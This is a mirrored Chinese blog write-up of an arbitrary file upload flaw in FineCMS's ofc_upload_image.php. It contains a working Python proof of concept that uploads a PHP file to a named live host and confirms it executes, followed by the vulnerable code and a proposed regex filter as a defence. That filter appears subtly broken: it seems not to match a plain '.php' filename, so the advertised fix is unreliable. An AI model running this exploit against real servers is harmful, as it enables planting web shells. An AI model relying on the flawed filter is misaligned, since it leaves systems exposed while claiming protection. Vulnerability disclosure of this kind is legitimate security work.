zoukankan      html  css  js  c++  java
  • FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul

    catalog

    1. 漏洞描述
    2. 漏洞触发条件
    3. 漏洞影响范围
    4. 漏洞代码分析
    5. 防御方法
    6. 攻防思考

    1. 漏洞描述

    Relevant Link:

    http://www.wooyun.org/bugs/wooyun-2015-0105251


    2. 漏洞触发条件

    0x1: POC

    #!/usr/bin/env python 
    # -*- coding: utf-8 -*- 
    #__author__ = '1c3z' 
    
    import urllib2 
    import random
    
    fileName = "shell" + str(random.randrange(1000,9999)) + ".php" 
    target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php" 
    
    def uploadShell():
        url = target + "?name=" + fileName
        req = urllib2.Request(url, headers={"Content-Type": "application/oct"}) 
        res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")
        return res.read()
    
    def poc():
        res = uploadShell()
        if res.find("tmp-upload-images") == -1:
            print "Failed !"
            return
    
        print "upload Shell success"
        url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName
        md5 = urllib2.urlopen(url).read()
        if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:
            print "poc: " + url 
    
    poc()


    3. 漏洞影响范围
    4. 漏洞代码分析

    /dayrui/libraries/Chart/ofc_upload_image.php

    $default_path = '../tmp-upload-images/'; 
    if (!file_exists($default_path)) mkdir($default_path, 0777, true);
    $destination = $default_path . basename( $_GET[ 'name' ] ); 
    echo 'Saving your image to: '. $destination;
    
    $jfh = fopen($destination, 'w') or die("can't open file");
    fwrite($jfh, $HTTP_RAW_POST_DATA);
    fclose($jfh);

    程序未对上传文件进行任何后缀、内容的检测和过滤


    5. 防御方法

    /dayrui/libraries/Chart/ofc_upload_image.php

    $default_path = '../tmp-upload-images/'; 
    if (!file_exists($default_path)) 
        mkdir($default_path, 0777, true);
    
    $destination = $default_path . basename( $_GET[ 'name' ] ); 
    
    /* */
    if (preg_match('#.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#i', trim($destination))) 
    {
        die("你指定的文件名被系统禁止!"); 
    }
    /* */
    
    echo 'Saving your image to: '. $destination;
    
    $jfh = fopen($destination, 'w') or die("can't open file");
    fwrite($jfh, $HTTP_RAW_POST_DATA);
    fclose($jfh);


    6. 攻防思考

    Copyright (c) 2015 LittleHann All rights reserved

  • 相关阅读:
    AI Dropout
    笔记2 区块链
    Visual Studio的下载安装
    第48课 thinkphp5添加商品库
    一个手机号可以注册绑定5个百度网盘,永久2T
    第39-43课 thinkphp5完成商品会员价格功能(后置勾子afterInsert)
    第37课 thinkphp5添加商品基本信息及通过前置钩子上传商品主图 模型事件(勾子函数)
    php中 为什么验证码 必须要开启 ob_clean 才可以显示
    网站同一用户只能在同一个地方登录
    微信小程序第3课 目录结构及小知识点
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4729648.html
Copyright © 2011-2022 走看看